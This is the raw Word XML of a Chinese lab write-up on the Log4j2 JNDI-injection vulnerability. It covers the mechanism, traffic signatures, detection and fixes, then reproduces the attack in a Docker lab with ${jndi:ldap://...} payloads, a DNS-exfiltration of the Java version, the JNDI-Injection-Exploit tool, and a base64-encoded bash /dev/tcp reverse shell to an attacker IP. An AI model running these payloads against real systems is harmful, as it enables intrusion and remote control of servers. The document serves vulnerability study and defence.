          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>prefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">去找对应的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lookup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，通过对应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136CA3D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实例调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lookup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>方法，最后将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>作为参数带入执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D63769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②详细过程分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A189BD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log4j2 框架下的 lookup 查询服务提供了${}字段解析功能，传进去的值会被直接解析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1FB277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当用户输入信息时，应用程序中的 log4j2 组件会将信息记录到日志中，假设日志中含有语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240E68E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${jndi:ldap:192.168.249.1:9001/poc.class}，log4j2就会去解析该信息，通过JNDI的lookup()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DA5DE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方法解析URL：ldap:192.168.249.1:9001/poc.class，解析到ldap，就会去 192.168.61.129:9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F520CE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的ldap服务找名为poc.class的资源，如果找不到则会去http服务中找，只要在ldap或者http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C723B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中找到poc.class ，就会将资源信息返回到JNDI接口，进而返回给应用程序的log4j2 组件，而</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B2C75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log4j2组件会将其下载下来，然后发现poc.class是个.class文件，就会去执行里面的代码，从</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1095A7C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而实现注入，我们就可以通过 poc.class 实现任意命令的执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5853257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受影响版本范围：2.0 ≤ Apache Log4j2 &lt; 2.15.0-rc2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D1E0DD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7AB2B03B" wp14:editId="341FB175">
            <wp:extent cx="6475730" cy="1897380"/>
            <wp:effectExtent l="0" t="0" r="1270" b="762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rcRect t="1117" b="2159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C3774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2.3Log4j2流量特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D84DAF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①恶意请求中包含 JNDI 协议地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502905D2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攻击者通常会在HTTP请求或其他网络流量中插入包含JNDI协议地址的字符串，如"ldap://"、</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D11B8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"rmi://"等。这些字符串会被log4j2解析为JNDI查找，从而导致远程代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011B27B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具体特征：包含形如如下的输入即可：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>${jndi:ldap:[//host][:port]/[object]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CFB7D5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②日志记录消息中包含可执行代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CC0EC5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攻击者构造的恶意日志记录消息可能包含可执行的Java代码，如 JNDI 注入 payload 。这些</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5F56E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代码会被 log4j2 解析和执行，从而触发远程代码执行漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77948D27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③异常堆栈中出现与JNDI相关的类或方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F80097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在应用程序的异常堆栈中，可能会出现与JNDI相关的类或方法，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3B583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如javax.naming.directory.InitialDirContext 等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B48BD3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4"/>
        </w:rPr>
        <w:t>这表明攻击者已经成功地利用了 log4j2 漏洞，执行了远程代码并导致异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71650713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 xml:space="preserve">④大量的异常日志记录： </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCD538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攻击者可能会尝试多次利用 log4j2 漏洞，因此在日志中可能会出现大量的异常日志记录。这</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0AEE3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些异常日志记录通常会包含与 JNDI 相关的内容，如 JNDI 协议地址或异常堆栈信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01616AFB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2.4如何</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>判断攻击成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1151DF1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1</w:t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ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>检查日志</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>有没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>攻击痕迹，具体看形如${jndi:ldap:[//host][:port]/[object]}的日志输出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE8999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lastRenderedPageBreak/>
        <w:t>2</w:t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ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>检查网络流量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>若出现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>异常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>LDAP请求到未知的、可疑的或恶意的服务器，可能遭受了攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52596DE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3</w:t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ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>服务器表现出异常行为，比如CPU、内存占用率异常增高，或者服务崩溃等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDA9EB5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2.5Log4j2漏洞修复</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D076F1B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①升级log4j2组件到新的安全版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413E211F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及时升级 log4j2 到最新的安全版本，以修复已知的漏洞并增强系统的安全性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07897297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移除或替换</w:t>
      </w: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含漏洞的代码文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFDB38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不升级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的话就删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>或替换JndiLookup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件包含了有漏洞的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DDA72D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zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43632E5B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③设置系统属性log4j2.formatMsgNoLookups=True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF63E10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这个设置将禁用 log4j2 中的消息查找（Lookups），这样可以防止恶意代码利用 JNDI 注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B7BFF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漏洞。通过设置此选项，log4j2 将不会解析消息中的变量或执行 JNDI 查找。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4BF32B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④对包含特定字符串的请求进行拦截</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBC984E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监测应用程序的日志，如果发现其中包含"jndi:ldap://"、"jndi:rmi://"等可疑字符串，可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612BC07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以使用WAF（Web应用程序防火墙）或 IDS（入侵检测系统）等工具来拦截这些请求，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>限制或者监</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6682ECF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控LDAP流量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，从而阻止潜在的攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CAB7B8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2.6漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F6F9D1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首先拉取靶场的最新镜像（需先装好 docker）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDA96F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指令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>docker pull vulfocus/log4j2-rce-2021-12-09:latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDDC1D1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3EE7B03E" wp14:editId="59611316">
            <wp:extent cx="6476365" cy="878205"/>
            <wp:effectExtent l="0" t="0" r="635" b="571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50"/>
                    <a:srcRect b="55498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14B16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②开启容器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608A74D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指令：docker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>run -d -p 9001:8080 vulfocus/log4j2-rce-2021-12-09:latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB2356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这里我是将靶场环境的 8080 端口映射到了本地的 9001（找一个未被占用的端口即可）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B67DB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因为 8080 端口是靶场默认所在的位置，后面的 9001 为一个自定义的本地端口号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3101A72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启用成功后，使用 docker ps 查看运行的容器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27765C8F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7C2627A7" wp14:editId="5ECC2AC0">
            <wp:extent cx="6475730" cy="1732915"/>
            <wp:effectExtent l="0" t="0" r="1270" b="444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51"/>
                    <a:srcRect b="16110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9A82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接下来我们直接访问本地的 9001 端口即可看到靶场环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D45921B" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E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5990F5F8" wp14:editId="29390C5A">
            <wp:extent cx="6475730" cy="1518285"/>
            <wp:effectExtent l="0" t="0" r="1270" b="571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BB6D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2.7漏洞验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DD161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首先使用 DNSLog平台获取一个子域名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA612B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点Get SubDomin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>获取子域名：7fprj5.dnslog.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2857C2" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="0C9BA9B2" wp14:editId="4AC9D2B4">
            <wp:extent cx="6475730" cy="1726565"/>
            <wp:effectExtent l="0" t="0" r="0" b="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53"/>
                    <a:srcRect t="20006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B9B8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/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>使用该子域名，我们构造 payload：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>${jndi:ldap://7fprj5.dnslog.cn}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404B1D2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点击靶场的 ?????</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAB46F4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3BA51058" wp14:editId="4670C859">
            <wp:extent cx="6477000" cy="1607185"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255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BEE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发现请求了文件hello，并且给参数 payload 传入了值 111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D228474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6FC2EA00" wp14:editId="239802E1">
            <wp:extent cx="6474460" cy="1043940"/>
            <wp:effectExtent l="0" t="0" r="0" b="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55"/>
                    <a:srcRect b="5572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047C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替换 payload 值为我们刚才构造的 payload，即：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0F98C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hyperlink r:id="rId56" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://127.0.0.1:9001/hello?payload=${jndi:ldap://7fprj5.dnslog.cn}</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A65F10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发送请求失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DD4DDF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19B33567" wp14:editId="0B1464B9">
            <wp:extent cx="6478270" cy="971550"/>
            <wp:effectExtent l="0" t="0" r="13970" b="381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14F2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因为是 get 请求，很可能是对我们传入的内容进行了 URL 解码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7946A7F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因此我们先对 payload 进行 URL 编码后再传入：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A79BC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/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>${jndi:ldap://7fprj5.dnslog.cn}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07101FB3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2868B871" wp14:editId="54789979">
            <wp:extent cx="6446520" cy="495300"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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CD9EA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31A4894E" wp14:editId="103440B8">
            <wp:extent cx="6478270" cy="766445"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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59"/>
                    <a:srcRect t="7452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0AF3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URL 编码后为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542E963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/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>%24%7Bjndi%3Aldap%3A%2F%2F7fprj5.dnslog.cn%7D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A458F8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请求：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799FF5D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/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>http://127.0.0.1:9001/hello?payload=%24%7Bjndi%3Aldap%3A%2F%2F7fprj5.dnslog.cn%7D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A679F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回显 ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A0E7BE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3FA37BFB" wp14:editId="7DD81B4E">
            <wp:extent cx="6478270" cy="1092835"/>
            <wp:effectExtent l="0" t="0" r="13970" b="4445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520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回到 DNSLog 平台，点击 Refresh Record 刷新记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D42562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可以看到 DNSLog 平台成功接收到解析记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F08CFC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669C7858" wp14:editId="1BC1AF4C">
            <wp:extent cx="6476365" cy="3018790"/>
            <wp:effectExtent l="0" t="0" r="635" b="13970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5F7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接下来我们构造 payload 尝试获取 Java 版本：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7824096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/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>${jndi:ldap://${sys:java.version}.7fprj5.dnslog.cn}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1988D47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编码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314A8C7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color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>%24%7Bjndi%3Aldap%3A%2F%2F%24%7Bsys%3Ajava.version%7D.7fprj5.dnslog.cn%7D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FB07B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传入 payload，回显 ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206405EC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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="706EBC97" wp14:editId="6345DFB8">
            <wp:extent cx="6480175" cy="1052195"/>
            <wp:effectExtent l="0" t="0" r="12065" b="14605"/>
            <wp:docPr id="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EDA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再次刷新记录，可以得出 sys:java.version 命令被执行了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2101CF8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成功获取到 Java 版本号为 1.8.0_312，证明确实存在 log4j2 远程代码执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D82508B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0AA48138" wp14:editId="63FDFFFB">
            <wp:extent cx="6478905" cy="2373630"/>
            <wp:effectExtent l="0" t="0" r="13335" b="3810"/>
            <wp:docPr id="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8C5AD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2.8漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A46E3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为方便后续测试，这里再开一台kali（192.168.249.132）作靶机，按前面的环境搭建步骤再搭建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2605B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一个靶场环境，而JNDI 注入工具装在另一台kali（192.168.249.128）上作为攻击机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB4D726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22523AB2" wp14:editId="47A27177">
            <wp:extent cx="6473190" cy="3140075"/>
            <wp:effectExtent l="0" t="0" r="3810" b="14605"/>
            <wp:docPr id="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EBF13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55E4EF87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4AC5EDA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搭建好后测试一下，可以正常访问到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263AF0D1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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="3DE7C1EA" wp14:editId="7F07061F">
            <wp:extent cx="6474460" cy="1393825"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="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550E7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①JNDI 注入工具安装</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6D72A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首先安装 JNDI 注入工具：JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D3539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指令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>git clone https://github.com/welk1n/JNDI-Injection-Exploit.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313BB907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4B82C47A" wp14:editId="72B867D7">
            <wp:extent cx="6480810" cy="1389380"/>
            <wp:effectExtent l="0" t="0" r="11430" b="12700"/>
            <wp:docPr id="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193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切换到 JNDI-Injection-Exploit 目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4571F40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指令：cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> JNDI-Injection-Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAB67F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编译安装，在该目录下执行如下命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC13EA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 xml:space="preserve">指令：mvn clean </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>package -DskipTests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698CB201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2774960C" wp14:editId="3EAD1669">
            <wp:extent cx="6474460" cy="1815465"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67"/>
                    <a:srcRect b="21971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B27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编译安装完成后，我们会得到一个 jar 文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEB905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位置在/root/JNDI-Injection-Exploit/target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0D13A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在运行结果的最后有给出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B8A500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1141A200" wp14:editId="1DF0840A">
            <wp:extent cx="6473825" cy="2319655"/>
            <wp:effectExtent l="0" t="0" r="3175" b="12065"/>
            <wp:docPr id="4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E999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切换进入到 target 目录：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cd target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F77E0BE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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="2F06234A" wp14:editId="19849571">
            <wp:extent cx="6474460" cy="1205230"/>
            <wp:effectExtent l="0" t="0" r="2540" b="13970"/>
            <wp:docPr id="4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C884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②工具用法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441A549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java -jar JNDI-Injection-Exploit-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.0-SNAPSHOT-all.jar -C "命令" -A "攻击机ip"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412BAFCC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③服务站点部署</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4403EC8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反弹 shell 到目标主机端口，这里以 7777 端口为例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659561C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bash -i &gt;&amp; /dev/tcp/192.168.249.128/7777 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED45F9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对命令进行 base64 编码 （命令必须经过编码，不然无法实现）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2462FC78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0E65D570" wp14:editId="73B9E4CE">
            <wp:extent cx="6473825" cy="889635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId70"/>
                    <a:srcRect b="58402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435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3D8B98BD" wp14:editId="2F6F65B3">
            <wp:extent cx="6475730" cy="349250"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1270"/>
            <wp:docPr id="5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F24F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得到：bash -c {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0OS4xMjgvNzc3NyAwPiYx}|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AAB7F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{base64,-d}|{bash,-i}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D60E94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将想要执行的命令替换成我们得到的 payload，以及填上我们的攻击机ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E150F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利用 JNDI 注入工具把这个反弹 shell 命令部署到 LDAP 服务上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EC9C7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在 target 目录下，执行如下命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773ADDD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java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar</w:t>
      </w:r>
    </w:p>
